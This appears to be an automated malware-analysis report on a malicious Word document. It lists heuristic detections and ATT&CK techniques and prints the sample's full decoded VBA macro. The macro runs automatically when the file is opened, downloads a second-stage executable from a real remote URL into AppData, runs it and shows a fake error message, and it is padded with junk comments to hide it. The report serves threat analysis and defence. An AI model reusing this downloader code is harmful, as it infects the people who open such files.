MALICIOUS
334
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
T1071.001 Web Protocols
T1105 Ingress Tool Transfer
The document body explicitly instructs the user to enable macros to view content, masquerading as a guide. Heuristics indicate the presence of VBA macros that utilize URLDownloadToFile, suggesting the script's intent is to download and execute a second-stage payload from a remote source. The AutoOpen macro marker further supports the automated execution of malicious code upon opening the document.
Heuristics 12
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal SxJGRjKiD As Long, ByVal YuhYFdBSh As String, ByVal jNje As String, ByVal ufc As Long, ByVal KC As Long) As Long -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
YTYTYTYTYTYTT = Environ("appdata") & "\" -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.globaltax.mx/db/logo.gif Referenced by macro
- http://w�ww.globp�Referenced by macro
- https://blu175.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=VoL5Z%2bfl%2bLLkwUjxLge0Y1IQDl8FQkwAvSV5mGR7ybM%3d0&url=http%3a%2f%2fapp.cfe.gob.mx%2faplicaciones%2fotros%2fConfirmacionAccesoServicios%2fImagenbit.aspxReferenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7965 bytes |
SHA-256: 7f1ec7934358cd9ce31b3d70c5f1aaa8c112e0ced15ad71b8116b38a4ff93d5b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'appointed Confederate Attorney General, later Secretary of War. American
Private Declare Function listen Lib "ws2_32" (ByVal s As Long, ByVal backlog As Integer) As Integer
Dim YTYTYTYTYTYTT As String
'became the head of one of the New York City blood bank. ( How does a
'agent Sergretti meets with FBI, Minutemen and others to plan kidnapping
Private Declare Function WSANtohl Lib "ws2_32" (ByVal hSocket As Long, ByVal lpNetLong As Long, lpHostLong As Long) As Integer
'Faces in the Crowd
Private Declare Function getsockopt Lib "ws2_32" (ByVal sck As Long, ByVal level As Long, ByVal optname As Long, ByVal optval As Long, optlen As Long) As Long
'hideout in Antarctica. Roosevelt sends Gen. »Wild Bill« Donovan on info-
'LBJ power to make war on Vietnam. Virginia Miller, later known as »Blue
Private Declare Function WSANtohs Lib "ws2_32" (ByVal hSocket As Long, ByVal lpNetShort As Integer, lpHostShort As Integer) As Integer
'born in Wayne County, New York, when the teenaged Fox sisters communica-
Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal uhQXseNh As Long, ByVal cwLKFWQ As Long, ByVal puhbwJx As Long, ByVal CsDrnv As Long, ByVal ckETWwDmfl As Long, ByVal bJaNlXW As Long) As Long
'The answers to this little mystery, Murder on the WHO Express will be quite
'1875 to 1947 — Life of Aleister Crowley, the Great Beast, Golden Dawn
Private Declare Function socket Lib "ws2_32" (ByVal iAddressFamily As Long, ByVal iType As Long, ByVal iProtocol As Long) As Long
'is murdered. Rex Heflin again visited by MIB in connection with his photos
Private Declare Function Connect Lib "ws2_32" (ByVal sck As Long, ByVal SckName As String, ByVal namelen As Long) As Long
'1937 - Spanish Civil War begins. First of 48 »Lost Colony« stones found
'who will presently remain anonymous.
Private Declare Function WSACleanup Lib "ws2_32" () As Integer
'QUELLENANHANC 69
'back of the Book Depository immediately after the assassination; Oswald
Private Declare Function WSAAsyncSelect Lib "ws2_32" (ByVal hSocket As Long, ByVal hWnd As Long, ByVal wMsg As Integer, ByVal lEvent As Long) As Integer
'witnessed ham radio operator establish contact with another world.
'Most people in there 40's are now carrying the virus through contaminated
Private Declare Function ntohl Lib "ws2_32" (ByVal netlong As Long) As Long
'secret police. CFR journal »Foreign Affairs« founded. King Tutankhamen's
'warfare center with the full blessing of the US government?
Private Declare Function WHGGHJHGJHJGetEvent Lib "ws2_32" (ByVal hEvent As Long) As Boolean
'organization. U.S. State Dept. creates Division of Special Research headed
Private Declare Function getpeername Lib "ws2_32" (ByVal sck As Long, name As Long, ByVal namelen As Long) As Long
'another attempt in Chicago also supposedly foiled. Attempted assassination
Private Declare Function GetSockName Lib "ws2_32" Alias "GetSockNameA" (ByVal sck As Long, name As Long, ByVal namelen As Long) As Long
'human totally psycho if he/she was not aware that
Private Declare Function inet_addr Lib "ws2_32" (ByVal cp As String) As Long
'and Bolivar die.
Private Declare Function WSAAsyncGetProtoByNumber Lib "ws2_32" (ByVal hWnd As Long, ByVal wMsg As Integer, ByVal iNumer As Integer, ByVal lpBuf As Long, ByVal BufLen As Long) As Long
'are approaching World War II mortality statistics here - without a shot being
'imprisoned in the Templars Temple tower. Massacres of September, in which
Private Declare Function closesocket Lib "ws2_32" (ByVal sck As Long) As Long
'CHINA WORK, WITH FULL PASSKEYS TO ALL THE LABORATORIES, THAN
Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal SxJGRjKiD As Long, ByVal YuhYFdBSh As String, ByVal jNje As String, ByVal ufc As Long, ByVal KC As Long) As Long
Sub Workbook_Open()
'1890 -- Biologist Yersin visits India, purportedly to recieve plague and cholera
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
Call JHHJKKJHHJKHJK
'with neglecting his health, died of cancer while awaiting retrial; David Ferrie,
'William Campbell Douglass, M.D.
'crash.
End Sub
Sub AutoOpen()
'and many of those directly involved in AIDS research, such as Robert Callo
'William Campbell Douglass, M.D.
Call JHHJKKJHHJKHJK
'William Campbell Douglass, M.D.
'using the cover of Harold Metcalf, of Drug Abuse Law Enforcement, who
End Sub
Sub Auto_Open()
'refugee leader Sylvio Odio is visited in Dallas by two Latins and »Leon Osward«
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
Call JHHJKKJHHJKHJK
'the AIDS in those vaccinated. Dr. Robert Gallo, who has been mixed up
'TO DUPLICATE AND DISTRIBUTE THESE FILES PROFUSELY. THE MORE
End Sub
Public Function JHHJKKJHHJKHJK() As Variant
'1946 — Murder of wire service king James Ragen by Syndicate friends of
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
YTYTYTYTYTYTT = Environ("appdata") & "\"
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
HGGHJHGJHJG
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
MsgBox Chr(69) & "s" & "t" & Chr(101) & " " & "d" & Chr(111) & "c" & Chr(117) & "m" & "e" & Chr(110) & "t" & Chr(111) & " " & Chr(110) & Chr(111) & " " & Chr(101) & "s" & Chr(32) & Chr(99) & "o" & "m" & Chr(112) & "a" & Chr(116) & "i" & "b" & "l" & Chr(101) & Chr(32) & Chr(99) & "o" & "n" & " " & "e" & Chr(115) & Chr(116) & Chr(101) & Chr(32) & Chr(101) & "q" & "u" & Chr(105) & "p" & "o" & "." & vbCrLf & vbCrLf & Chr(80) & Chr(111) & Chr(114) & Chr(32) & "f" & "a" & "v" & "o" & Chr(114) & Chr(32) & "i" & Chr(110) & Chr(116) & "e" & Chr(110) & Chr(116) & Chr(101) & " " & "d" & Chr(101) & "s" & "d" & Chr(101) & " " & Chr(111) & "t" & Chr(114) & "o" & Chr(32) & Chr(101) & Chr(113) & "u" & Chr(105) & "p" & Chr(111) & ".", vbCritical, "E" & "q" & "u" & Chr(105) & Chr(112) & "o" & " " & "n" & Chr(111) & Chr(32) & "c" & "o" & Chr(109) & "p" & "a" & Chr(116) & "i" & Chr(98) & Chr(108) & Chr(101) 'Lancet. Their reply : » Thank you for that interesting letter on AIDS. I am
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
Application.DisplayAlerts = False
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
Application.Quit
End Function
Public Function HGGHJHGJHJG(Optional OOIOIOIOIIO As String = "Deze website gebruikt cookies. Als u besluit door te gaan zonder de cookie instellingen van uw browser aan te passen, gaat u akkoord met ons ") As Variant
OOIOIOIOIIO = FRRFRFFRFR
URLDownloadToFileA 0&, "http://www.globaltax.mx/db/logo.gif", YTYTYTYTYTYTT & StrReverse(OOIOIOIOIIO), 0&, 0&
'plot to kill JFK). Ferrie allegedly flies to Dallas on evening after assassination
'QUELLENANHANC 87
'yes and the next it's no - depending upon what was served for lunch, or
ShellExecuteW 0&, StrPtr("Open"), StrPtr(YTYTYTYTYTYTT & StrReverse(OOIOIOIOIIO)), StrPtr(""), StrPtr(""), 1
'create a killer virus which was then used in a successful experiment in Africa.
End Function
Function FRRFRFFRFR() As String
FRRFRFFRFR = "ex" & "e.d" & "roW"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.